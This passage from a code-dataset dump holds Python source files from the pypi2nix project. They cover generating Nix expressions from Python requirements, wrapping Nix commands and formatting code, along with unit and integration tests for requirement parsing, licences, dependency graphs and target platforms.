0.6677631735801697, "avg_line_length": 26.636363983154297, "blob_id": "3dc9be8d3fdbc00ed641271691a956e01a1e3202", "content_id": "267217efe40815b594b18db6c5c561ad0ae8fc3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 81, "num_lines": 22, "path": "/mypy/parsley.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import overload\n\nclass ParseError(Exception):\n def formatError(self) -> str: ...\n\n@overload\ndef makeGrammar(source: str, bindings: Dict[str, Callable[..., Any]]) -> Any: ...\n@overload\ndef makeGrammar(\n source: str, bindings: Dict[str, Callable[..., Any]], name: str\n) -> Any: ...\n@overload\ndef makeGrammar(\n source: 
str, bindings: Dict[str, Callable[..., Any]], unwrap: bool\n) -> Any: ...\n@overload\ndef makeGrammar(\n source: str, bindings: Dict[str, Callable[..., Any]], name: str, unwrap: bool\n) -> Any: ...\n" }, { "alpha_fraction": 0.6474584341049194, "alphanum_fraction": 0.6504912972450256, "avg_line_length": 39.014564514160156, "blob_id": "0a8f87d5ccebc127574461813e09fc15c47514d5", "content_id": "631e481f1e8f74ac546580fd50b7bd0aa0ccc7c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8243, "license_type": "no_license", "max_line_length": 84, "num_lines": 206, "path": "/src/pypi2nix/main.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport sys\nfrom typing import List\n\nfrom pypi2nix.configuration import ApplicationConfiguration\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.expression_renderer import render_expression\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.external_dependency_collector import ExternalDependencyCollector\nfrom pypi2nix.external_dependency_collector import RequirementDependencyRetriever\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.memoize import memoize\nfrom pypi2nix.metadata_fetcher import MetadataFetcher\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.pip import NixPip\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements_collector import RequirementsCollector\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import PlatformGenerator\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.version import pypi2nix_version\nfrom pypi2nix.wheel_builder import WheelBuilder\n\n\nclass Pypi2nix:\n def __init__(self, configuration: ApplicationConfiguration) -> None:\n self.configuration = configuration\n\n def run(self) -> None:\n requirements = self.requirements_collector().requirements()\n self.logger().info(\"pypi2nix v{} running ...\".format(pypi2nix_version))\n if not requirements:\n self.logger().info(\"No requirements were specified. 
Ending program.\")\n return\n\n setup_requirements = self.setup_requirements_collector().requirements()\n requirements_name = os.path.join(\n self.configuration.target_directory, self.configuration.output_basename\n )\n\n sources = Sources()\n sources.update(setup_requirements.sources())\n sources.update(requirements.sources())\n sources.update(self.setup_requirements_collector().sources())\n sources.update(self.requirements_collector().sources())\n\n self.logger().info(\"Downloading wheels and creating wheelhouse ...\")\n\n pip = NixPip(\n nix=self.nix(),\n project_directory=self.configuration.project_directory,\n extra_env=self.configuration.extra_environment,\n extra_build_inputs=self._extra_build_inputs(),\n wheels_cache=self.configuration.wheels_caches,\n target_platform=self.target_platform(),\n logger=self.logger(),\n requirement_parser=self.requirement_parser(),\n )\n wheel_builder = WheelBuilder(\n pip=pip,\n download_directory=self.configuration.project_directory / \"downloads\",\n lib_directory=self.configuration.project_directory / \"lib\",\n extracted_wheel_directory=self.configuration.project_directory\n / \"extracted-wheels\",\n wheel_directory=self.configuration.project_directory / \"wheels\",\n logger=self.logger(),\n requirement_parser=self.requirement_parser(),\n target_platform=self.target_platform(),\n base_dependency_graph=self.base_dependency_graph(),\n )\n wheels = wheel_builder.build(\n requirements=requirements, setup_requirements=setup_requirements\n )\n requirements_frozen = wheel_builder.get_frozen_requirements()\n source_distributions = wheel_builder.source_distributions\n\n self.logger().info(\"Extracting metadata from pypi.python.org ...\")\n\n metadata_fetcher = MetadataFetcher(\n sources=sources,\n logger=self.logger(),\n requirement_parser=self.requirement_parser(),\n pypi=Pypi(logger=self.logger()),\n )\n\n packages_metadata = metadata_fetcher.main(\n wheel_paths=wheels,\n target_platform=self.target_platform(),\n source_distributions=source_distributions,\n )\n self.logger().info(\"Generating Nix expressions ...\")\n\n render_expression(\n packages_metadata=packages_metadata,\n sources=sources,\n requirements_name=requirements_name,\n requirements_frozen=requirements_frozen,\n extra_build_inputs=(\n self.configuration.extra_build_inputs\n if self.configuration.emit_extra_build_inputs\n else []\n ),\n enable_tests=self.configuration.enable_tests,\n python_version=self.configuration.python_version,\n target_directory=self.configuration.target_directory,\n logger=self.logger(),\n common_overrides=self.configuration.overrides,\n target_platform=self.target_platform(),\n )\n if self.configuration.dependency_graph_output_location:\n dependency_graph = DependencyGraph()\n for wheel in packages_metadata:\n dependency_graph.import_wheel(wheel, self.requirement_parser())\n with open(\n str(self.configuration.dependency_graph_output_location), \"w\"\n ) as output_file:\n output_file.write(dependency_graph.serialize())\n self.print_user_information()\n\n def print_user_information(self) -> None:\n self.logger().info(\n \"\\n\".join(\n [\n \"\",\n \"Nix expressions generated successfully.\",\n \"\",\n \"To start development run:\",\n \" nix-shell requirements.nix -A interpreter\",\n \"\",\n \"More information you can find at\",\n \" https://github.com/nix-community/pypi2nix\",\n \"\",\n ]\n )\n )\n\n @memoize\n def _extra_build_inputs(self) -> List[ExternalDependency]:\n retriever = RequirementDependencyRetriever()\n collector = ExternalDependencyCollector(\n 
requirement_dependency_retriever=retriever\n )\n for external_input in self.configuration.extra_build_inputs:\n collector.collect_explicit(external_input)\n return list(collector.get_collected())\n\n @memoize\n def requirements_collector(self) -> RequirementsCollector:\n requirement_collector = RequirementsCollector(\n self.target_platform(),\n self.requirement_parser(),\n self.logger(),\n str(self.configuration.project_directory),\n self.base_dependency_graph(),\n )\n for item in self.configuration.requirements:\n requirement_collector.add_line(item)\n for requirement_file_path in self.configuration.requirement_files:\n requirement_collector.add_file(requirement_file_path)\n return requirement_collector\n\n @memoize\n def setup_requirements_collector(self) -> RequirementsCollector:\n setup_requirement_collector = RequirementsCollector(\n self.target_platform(),\n self.requirement_parser(),\n self.logger(),\n str(self.configuration.project_directory),\n DependencyGraph(),\n )\n for build_input in self.configuration.setup_requirements:\n setup_requirement_collector.add_line(build_input)\n return setup_requirement_collector\n\n @memoize\n def requirement_parser(self) -> RequirementParser:\n return RequirementParser(self.logger())\n\n @memoize\n def target_platform(self) -> TargetPlatform:\n platform_generator = PlatformGenerator(nix=self.nix(), logger=self.logger())\n target_platform = platform_generator.from_python_version(\n self.configuration.python_version\n )\n return target_platform\n\n @memoize\n def nix(self) -> Nix:\n return Nix(\n nix_path=self.configuration.nix_path,\n executable_directory=self.configuration.nix_executable_directory,\n logger=self.logger(),\n )\n\n @memoize\n def logger(self) -> Logger:\n logger: Logger = StreamLogger(output=sys.stdout)\n logger.set_verbosity(self.configuration.verbosity)\n return logger\n\n @memoize\n def base_dependency_graph(self) -> DependencyGraph:\n return self.configuration.dependency_graph_input\n" }, { "alpha_fraction": 0.657681941986084, "alphanum_fraction": 0.698113203048706, "avg_line_length": 36.099998474121094, "blob_id": "04617ef9f71d7b01b5e3e0082536b8d5f9b57fc4", "content_id": "3d4d03e80e612a27fc353c47976f3e06d6ebecc6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 742, "license_type": "permissive", "max_line_length": 109, "num_lines": 20, "path": "/unittests/regression/test_issue_363.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "\"\"\"Regression test for https://github.com/nix-community/pypi2nix/issues/363\"\"\"\nfrom pypi2nix.requirement_parser import RequirementParser\n\n\ndef test_can_parse_enum_requirement_from_issue_363(\n requirement_parser: RequirementParser,\n):\n requirement = requirement_parser.parse(\n \"enum34 (>=1.0.4) ; (python_version=='2.7' or python_version=='2.6' or python_version=='3.3')\"\n )\n assert requirement.name() == \"enum34\"\n\n\ndef test_can_parse_pyinotify_requirement_from_issue_363(\n requirement_parser: RequirementParser,\n):\n requirement = requirement_parser.parse(\n \"pyinotify (>=0.9.6) ; (sys_platform!='win32' and sys_platform!='darwin' and sys_platform!='sunos5')\"\n )\n assert requirement.name() == \"pyinotify\"\n" }, { "alpha_fraction": 0.735144317150116, "alphanum_fraction": 0.7504244446754456, "avg_line_length": 31.72222137451172, "blob_id": "6d732d8fa189344ecd1b6930fc83c62c2a96857a", "content_id": "b24ab5c8aa1eb58be2e948c1c5f59eba4dd47cb7", "detected_licenses": [ "Apache-2.0" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 589, "license_type": "permissive", "max_line_length": 77, "num_lines": 18, "path": "/unittests/test_license.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.license import license_from_string\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.wheel import Wheel\n\nfrom .logger import get_logger_output\n\n\ndef test_license_from_string_detects_apache_2_0() -> None:\n assert license_from_string(\"Apache 2.0\") == \"licenses.asl20\"\n\n\ndef test_license_from_string_detects_bsd_dash_licenses() -> None:\n assert license_from_string(\"BSD - whatever\") == \"licenses.bsdOriginal\"\n\n\ndef test_that_license_of_flit_is_detected(flit_wheel: Wheel, logger: Logger):\n assert flit_wheel.license\n assert \"WARNING\" not in get_logger_output(logger)\n" }, { "alpha_fraction": 0.7074969410896301, "alphanum_fraction": 0.710364580154419, "avg_line_length": 29.512500762939453, "blob_id": "f6f5b40529c45fcd7777441574b61dd38efcdd1e", "content_id": "d934c7b84a8e909abececb78f3e5ff5263856f6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2441, "license_type": "permissive", "max_line_length": 88, "num_lines": 80, "path": "/unittests/test_dependency_graph_serialization.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from io import StringIO\n\nfrom hypothesis import given\nfrom hypothesis.strategies import booleans\nfrom hypothesis.strategies import composite\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import lists\nfrom hypothesis.strategies import text\n\nfrom pypi2nix.dependency_graph import CyclicDependencyOccured\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.requirements import VersionRequirement\n\nlogger = StreamLogger(output=StringIO())\n\n\n@composite\ndef requirement(draw, name=text(min_size=1)):\n return VersionRequirement(\n name=draw(name),\n logger=logger,\n versions=[],\n extras=set(),\n environment_markers=None,\n )\n\n\n@composite\ndef external_dependency(draw, attribute_name=text(min_size=1)):\n return ExternalDependency(attribute_name=draw(attribute_name))\n\n\n@composite\ndef dependency_graph(\n draw,\n python_packages=lists(requirement(), unique_by=lambda x: x.name()),\n external_dependencies=lists(external_dependency()),\n is_runtime_dependency=booleans(),\n selections=integers(),\n):\n graph = DependencyGraph()\n packages = draw(python_packages)\n if not packages:\n return graph\n for package in packages:\n index = draw(selections) % len(packages)\n try:\n if draw(is_runtime_dependency):\n graph.set_runtime_dependency(\n dependent=package, dependency=packages[index]\n )\n else:\n graph.set_buildtime_dependency(\n dependent=package, dependency=packages[index]\n )\n except CyclicDependencyOccured:\n continue\n for dependency in draw(external_dependencies):\n graph.set_external_dependency(\n dependent=packages[draw(selections) % len(packages)], dependency=dependency\n )\n return graph\n\n\n@given(dependency_graph=dependency_graph())\ndef test_equality_to_self(dependency_graph):\n assert dependency_graph == dependency_graph\n\n\ndef test_equality_of_empty_graphs():\n assert DependencyGraph() == DependencyGraph()\n\n\n@given(dependency_graph=dependency_graph())\ndef test_serialization_and_deserialization_leads_to_identity(\n 
dependency_graph: DependencyGraph,\n):\n assert DependencyGraph.deserialize(dependency_graph.serialize()) == dependency_graph\n" }, { "alpha_fraction": 0.5541049242019653, "alphanum_fraction": 0.5556113719940186, "avg_line_length": 30.61111068725586, "blob_id": "695319e5cafd716cfddee1aa2481a35a86094c15", "content_id": "c1f97d430bfc03f2694e46df435a9e64cb1b9303", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3983, "license_type": "no_license", "max_line_length": 87, "num_lines": 126, "path": "/src/pypi2nix/nix.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.utils import NixOption\nfrom pypi2nix.utils import cmd\nfrom pypi2nix.utils import create_command_options\n\n\nclass ExecutableNotFound(FileNotFoundError):\n pass\n\n\nclass EvaluationFailed(Exception):\n def __init__(self, *args, output: Optional[str] = None, **kwargs): # type: ignore\n super().__init__(self, *args, **kwargs) # type: ignore\n self.output: Optional[str] = output\n\n\nclass Nix:\n def __init__(\n self,\n logger: Logger,\n nix_path: List[str] = [],\n executable_directory: Optional[str] = None,\n ):\n self.nix_path = nix_path\n self.executable_directory = executable_directory\n self.logger = logger\n\n def evaluate_expression(self, expression: str) -> str:\n output = self.run_nix_command(\n \"nix-instantiate\", [\"--eval\", \"--expr\", expression]\n )\n # cut off the last newline character append to the output\n return output[:-1]\n\n def shell(\n self,\n command: str,\n derivation_path: str,\n nix_arguments: Dict[str, NixOption] = {},\n pure: bool = True,\n ) -> str:\n output = self.run_nix_command(\n \"nix-shell\",\n create_command_options(nix_arguments)\n + ([\"--pure\"] if pure else [])\n + [derivation_path, \"--run\", command],\n )\n return output\n\n def build(\n self,\n source_file: str,\n attribute: Optional[str] = None,\n out_link: Optional[str] = None,\n arguments: Dict[str, NixOption] = dict(),\n ) -> None:\n self.run_nix_command(\n \"nix-build\",\n [source_file]\n + ([\"-o\", out_link] if out_link else [])\n + ([\"-A\", attribute] if attribute else [])\n + create_command_options(arguments),\n )\n\n def evaluate_file(self, source_file: str, attribute: Optional[str] = None) -> None:\n absolute_source_file = os.path.abspath(source_file)\n self.evaluate_expression(\n f\"let file_path = {absolute_source_file}; \"\n + \"file_expression = import file_path {}; \"\n + \"in \"\n + f\"file_expression.{attribute}\"\n if attribute\n else \"file_expression\",\n )\n\n def build_expression(\n self,\n expression: str,\n out_link: Optional[str] = None,\n arguments: Dict[str, NixOption] = dict(),\n ) -> None:\n self.run_nix_command(\n \"nix-build\",\n [\"--expr\", expression]\n + ([\"-o\", out_link] if out_link else [\"--no-out-link\"])\n + create_command_options(arguments),\n )\n\n def run_nix_command(self, binary_name: str, command: List[str]) -> str:\n final_command = (\n [self.executable_path(binary_name)] + self.nix_path_arguments() + command\n )\n returncode: int\n output: str\n try:\n returncode, output = cmd(final_command, self.logger)\n except FileNotFoundError:\n raise ExecutableNotFound(\n \"Could not find executable '{program}'\".format(program=binary_name)\n )\n if returncode != 0:\n raise EvaluationFailed(\n \"'{program}' exited with non-zero exit code ({code}).\".format(\n 
program=binary_name, code=returncode\n ),\n output=output,\n )\n return output\n\n def nix_path_arguments(self) -> List[str]:\n path_arguments = []\n for path in self.nix_path:\n path_arguments.append(\"-I\")\n path_arguments.append(path)\n return path_arguments\n\n def executable_path(self, program_name: str) -> str:\n if self.executable_directory is None:\n return program_name\n else:\n return os.path.join(self.executable_directory, program_name)\n" }, { "alpha_fraction": 0.5887500047683716, "alphanum_fraction": 0.5912500023841858, "avg_line_length": 29.37974739074707, "blob_id": "7a5eeb8e6dd4d857aa348ea0ac5d623020750169", "content_id": "448b756b9124ade40826753c3c7f7ac483197324", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2400, "license_type": "no_license", "max_line_length": 88, "num_lines": 79, "path": "/scripts/format_sources.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport os.path\nimport subprocess\nimport sys\nfrom typing import List\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom repository import ROOT\n\n\nclass CodeFormatter:\n def __init__(self):\n self._logger = initialize_logger()\n\n def main(self):\n relative_paths = [\n \"src\",\n \"unittests\",\n \"integrationtests\",\n \"conftest.py\",\n \"setup.py\",\n \"mypy\",\n \"scripts\",\n ]\n self.format_nix_files()\n absolute_paths = [os.path.join(ROOT, relative) for relative in relative_paths]\n self._logger.info(\"Running isort\")\n subprocess.run([\"isort\", \"-rc\", \".\"], check=True)\n self._logger.info(\"Running black\")\n subprocess.run([\"black\"] + absolute_paths, check=True)\n self.run_check_process(\"flake8\")\n self.run_check_process(\"mypy\")\n\n def run_check_process(self, executable, arguments: List[str] = []):\n self._logger.info(f\"Running {executable}\")\n try:\n subprocess.run([executable] + arguments, check=True)\n except subprocess.CalledProcessError:\n self._logger.error(f\"{executable} failed, see errors above\")\n exit(1)\n\n def format_nix_files(self) -> None:\n if is_nixfmt_installed():\n self._logger.info(\"Formatting nix files\")\n integration_test_nix_files = find_nix_files_in_integration_tests()\n subprocess.run(\n [\"nixfmt\", \"default.nix\", \"src/pypi2nix/pip/bootstrap.nix\"]\n + integration_test_nix_files,\n check=True,\n )\n else:\n self._logger.warning(\n \"Could not find `nixfmt` executable. 
Cannot format .nix files\"\n )\n\n\ndef find_nix_files_in_integration_tests() -> List[str]:\n found_files: List[str] = []\n for root, _, files in os.walk(\"integrationtests\"):\n found_files += [\n os.path.join(root, file) for file in files if file.endswith(\".nix\")\n ]\n return found_files\n\n\ndef initialize_logger() -> Logger:\n return StreamLogger(output=sys.stdout)\n\n\ndef is_nixfmt_installed() -> bool:\n process_result = subprocess.run(\"nixfmt --version\", shell=True, capture_output=True)\n return process_result.returncode == 0\n\n\nif __name__ == \"__main__\":\n CodeFormatter().main()\n" }, { "alpha_fraction": 0.6570205688476562, "alphanum_fraction": 0.6653760075569153, "avg_line_length": 32.84138107299805, "blob_id": "eb281b93deea115d4aca6f7ae4b1534b2e7106f0", "content_id": "f8b53b4b4b2078a81441dc2bc2805a8de3789fd8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4907, "license_type": "permissive", "max_line_length": 119, "num_lines": 145, "path": "/unittests/test_target_platform.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport os.path\nimport platform\nimport sys\nfrom collections import namedtuple\n\nimport pytest\nfrom packaging.markers import default_environment\n\nfrom pypi2nix.environment_marker import EnvironmentMarker\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.target_platform import PlatformGenerator\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .switches import nix\n\n\ndef format_full_version(info):\n version = \"{0.major}.{0.minor}.{0.micro}\".format(info)\n kind = info.releaselevel\n if kind != \"final\":\n version += kind[0] + str(info.serial)\n return version\n\n\n@pytest.fixture\ndef python_3_environment_nix(tmp_path_factory):\n directory = str(tmp_path_factory.mktemp(\"python_3_environment\"))\n path = os.path.join(directory, \"environment.nix\")\n with open(path, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"with import <nixpkgs> {};\",\n 'stdenv.mkDerivation { name = \"python3-env\"; buildInputs = [python3 python3.pkgs.setuptools]; }',\n ]\n )\n )\n return path\n\n\n@pytest.fixture\ndef python_3_6_environment_nix(tmp_path_factory):\n directory = str(tmp_path_factory.mktemp(\"python_3_6_environment\"))\n path = os.path.join(directory, \"environment.nix\")\n with open(path, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"with import <nixpkgs> {};\",\n 'stdenv.mkDerivation { name = \"python3-env\"; buildInputs = [python36 python36.pkgs.setuptools]; }',\n ]\n )\n )\n return path\n\n\nMarkerDefinition = namedtuple(\"NamedTuple\", [\"name\", \"value\"])\n\n\n@pytest.fixture(\n params=(\n MarkerDefinition(\"os_name\", os.name),\n MarkerDefinition(\"sys_platform\", sys.platform),\n MarkerDefinition(\"platform_machine\", platform.machine()),\n MarkerDefinition(\n \"platform_python_implementation\", platform.python_implementation()\n ),\n MarkerDefinition(\"platform_release\", platform.release()),\n MarkerDefinition(\"platform_system\", platform.system()),\n MarkerDefinition(\"platform_version\", platform.version()),\n MarkerDefinition(\n \"python_version\", \".\".join(platform.python_version_tuple()[:2])\n ),\n MarkerDefinition(\"python_full_version\", platform.python_version()),\n MarkerDefinition(\"implementation_name\", sys.implementation.name),\n MarkerDefinition(\n \"implementation_version\",\n format_full_version(sys.implementation.version)\n if hasattr(sys, \"implementation\")\n else \"0\",\n ),\n 
)\n)\ndef environment_marker_definition(request):\n \"\"\"This fixture has been generate from https://www.python.org/dev/peps/pep-0508/#environment-markers\"\"\"\n return request.param\n\n\n@nix\ndef test_that_target_platform_can_be_constructed_from_python_version(\n platform_generator: PlatformGenerator, nix, python_3_environment_nix\n):\n platform = platform_generator.from_python_version(PythonVersion.python3)\n assert isinstance(platform, TargetPlatform)\n\n python_3_version = nix.shell(\n command='python -c \"from platform import python_version; print(python_version()[:3])\"',\n derivation_path=python_3_environment_nix,\n ).splitlines()[0]\n assert platform.python_version == python_3_version\n\n\n@nix\ndef test_that_current_platform_to_environment_dict_equals_default_environment(\n current_platform: TargetPlatform,\n):\n assert current_platform.environment_dictionary() == default_environment()\n\n\n@nix\ndef test_that_generated_platform_environment_dictionary_respects_python_version(\n platform_generator: PlatformGenerator, python_3_6_environment_nix, nix\n):\n platform = platform_generator.from_python_version(PythonVersion.python36)\n assert isinstance(platform, TargetPlatform)\n output_string = nix.shell(\n command=\" \".join(\n [\n 'python -c \"from setuptools._vendor.packaging.markers import default_environment;',\n \"from json import dumps;\",\n 'print(dumps(default_environment()))\"',\n ]\n ),\n derivation_path=python_3_6_environment_nix,\n )\n output_json = json.loads(output_string)\n assert platform.environment_dictionary() == output_json\n\n\ndef test_that_environment_marker_with_unknown_os_name_do_not_apply_to_current_platform(\n current_platform: TargetPlatform,\n):\n marker = EnvironmentMarker(\"os_name == 'fake_os_in_unittest'\")\n assert not marker.applies_to_platform(current_platform)\n\n\ndef test_that_environment_markers_from_pep_are_correct_for_current_platform(\n environment_marker_definition: MarkerDefinition, current_platform: TargetPlatform\n):\n assert (\n getattr(current_platform, environment_marker_definition.name)\n == environment_marker_definition.value\n )\n" }, { "alpha_fraction": 0.6853448152542114, "alphanum_fraction": 0.7112069129943848, "avg_line_length": 28, "blob_id": "913a81e18c518fabecc8fae0090e729c4de870fd", "content_id": "ff736117ffee138f19f588b3794e56e7f6ae3e9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 232, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/integrationtests/test_aiohttp.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass AiohttpTestCase(IntegrationTest):\n name_of_testcase = \"aiohttp\"\n code_for_testing = [\"import aiohttp\"]\n requirements = [\"aiohttp==2.0.6.post1\"]\n python_version = \"python35\"\n" }, { "alpha_fraction": 0.5230024456977844, "alphanum_fraction": 0.5326876640319824, "avg_line_length": 19.649999618530273, "blob_id": "d46e00bb93a2efe453959d53b322f8fa2da8bf8b", "content_id": "59990ec22fdac4ad64fe5ef135cb1ed3bd26aacb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 38, "num_lines": 20, "path": "/integrationtests/test_pillow.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass PillowTestCase(IntegrationTest):\n name_of_testcase = \"pillow\"\n code_for_testing = [\"import 
PIL\"]\n requirements = [\"Pillow==7.1.2\"]\n\n external_dependencies = [\n \"pkgconfig\",\n \"zlib\",\n \"libjpeg\",\n \"openjpeg\",\n \"libtiff\",\n \"freetype\",\n \"lcms2\",\n \"libwebp\",\n \"tcl\",\n \"xorg.libxcb\",\n ]\n" }, { "alpha_fraction": 0.623798668384552, "alphanum_fraction": 0.6249367594718933, "avg_line_length": 37.019229888916016, "blob_id": "a1b037b39c724a577a515aa76d45614eac7e7c2c", "content_id": "67f19ba8ba70d60e074f5743c25faec794f23b6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7908, "license_type": "no_license", "max_line_length": 88, "num_lines": 208, "path": "/src/pypi2nix/requirement_set.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import Iterable\nfrom typing import Iterator\nfrom typing import Optional\nfrom typing import TypeVar\nfrom typing import Union\n\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.requirements_file import RequirementsFile\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\n\nT = TypeVar(\"T\")\n\n\nclass RequirementSet:\n def __init__(self, target_platform: TargetPlatform) -> None:\n self.requirements: Dict[str, Requirement] = dict()\n self.constraints: Dict[str, Requirement] = dict()\n self.target_platform = target_platform\n\n def add(self, requirement: Requirement) -> None:\n if requirement.name() in self.requirements:\n self.requirements[requirement.name()] = self.requirements[\n requirement.name()\n ].add(requirement, self.target_platform)\n elif requirement.name() in self.constraints:\n self.requirements[requirement.name()] = self.constraints[requirement.name()]\n del self.constraints[requirement.name()]\n self.add(requirement)\n else:\n self.requirements[requirement.name()] = requirement\n\n def to_file(\n self,\n project_dir: str,\n target_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> RequirementsFile:\n with tempfile.TemporaryDirectory() as directory:\n requirements_txt = os.path.join(directory, \"requirements.txt\")\n constraints_txt = os.path.join(directory, \"constraints.txt\")\n with open(requirements_txt, \"w\") as f:\n print(self._requirements_file_content(target_platform), file=f)\n print(\"-c \" + constraints_txt, file=f)\n with open(constraints_txt, \"w\") as f:\n print(self._constraints_file_content(target_platform), file=f)\n requirements_file = RequirementsFile(\n requirements_txt, project_dir, requirement_parser, logger=logger\n )\n requirements_file.process()\n return requirements_file\n\n def add_constraint(self, requirement: Requirement) -> None:\n if requirement.name() in self.requirements:\n self.add(requirement)\n elif requirement.name() in self.constraints:\n self.constraints[requirement.name()] = self.constraints[\n requirement.name()\n ].add(requirement, self.target_platform)\n else:\n self.constraints[requirement.name()] = requirement\n\n def filter(\n self, filter_function: Callable[[Requirement], bool]\n ) -> \"RequirementSet\":\n filtered_requirement_set = RequirementSet(self.target_platform)\n filtered_requirement_set.constraints = self.constraints\n for requirement in self:\n if filter_function(requirement):\n 
filtered_requirement_set.add(requirement)\n return filtered_requirement_set\n\n def to_constraints_only(self) -> \"RequirementSet\":\n new_requirement_set = RequirementSet(self.target_platform)\n for requirement in list(self.requirements.values()) + list(\n self.constraints.values()\n ):\n new_requirement_set.add_constraint(requirement)\n return new_requirement_set\n\n @classmethod\n def from_file(\n constructor,\n requirements_file: RequirementsFile,\n target_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> \"RequirementSet\":\n file_lines = requirements_file.read().splitlines()\n requirements_set = constructor(target_platform)\n for line in file_lines:\n try:\n requirement = requirement_parser.parse(line)\n except ParsingFailed:\n detected_requirements = constructor._handle_non_requirement_line(\n line, target_platform, requirement_parser, logger\n )\n requirements_set += detected_requirements\n else:\n requirements_set.add(requirement)\n return requirements_set\n\n def sources(self) -> Sources:\n sources = Sources()\n for requirement in self.requirements.values():\n source = requirement.source()\n if source is None:\n continue\n else:\n sources.add(requirement.name(), source)\n return sources\n\n def get(self, key: str, default: Optional[T] = None) -> Union[Requirement, None, T]:\n try:\n return self[key]\n except KeyError:\n return default\n\n def __len__(self) -> int:\n return len(self.requirements)\n\n def __add__(self, other: \"RequirementSet\") -> \"RequirementSet\":\n requirement_set = RequirementSet(self.target_platform)\n\n requirements = list(self.requirements.values()) + list(\n other.requirements.values()\n )\n for requirement in requirements:\n requirement_set.add(requirement)\n\n constraints = list(self.constraints.values()) + list(other.constraints.values())\n for constraint in constraints:\n requirement_set.add_constraint(constraint)\n\n return requirement_set\n\n def __contains__(self, name: str) -> bool:\n return name in self.requirements\n\n def __iter__(self) -> Iterator[Requirement]:\n yield from self.requirements.values()\n\n def __getitem__(self, key: str) -> Requirement:\n return self.requirements[canonicalize_name(key)]\n\n def _requirements_file_content(self, target_platform: TargetPlatform) -> str:\n return self._requirements_to_file_content(\n self.requirements.values(), target_platform\n )\n\n def _constraints_file_content(self, target_platform: TargetPlatform) -> str:\n return self._requirements_to_file_content(\n self.constraints.values(), target_platform\n )\n\n @classmethod\n def _requirements_to_file_content(\n _, requirements: Iterable[Requirement], target_platform: TargetPlatform\n ) -> str:\n return \"\\n\".join(\n [\n requirement.to_line()\n for requirement in requirements\n if requirement.applies_to_target(target_platform)\n ]\n )\n\n @classmethod\n def _handle_non_requirement_line(\n constructor,\n line: str,\n target_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> \"RequirementSet\":\n line = line.strip()\n if line.startswith(\"-c \"):\n include_path = line[2:].strip()\n with tempfile.TemporaryDirectory() as project_directory:\n requirements_file = RequirementsFile(\n include_path, project_directory, requirement_parser, logger\n )\n requirements_file.process()\n return constructor.from_file(\n requirements_file, target_platform, requirement_parser, logger\n ).to_constraints_only()\n elif line.startswith(\"-r \"):\n include_path = line[2:].strip()\n with 
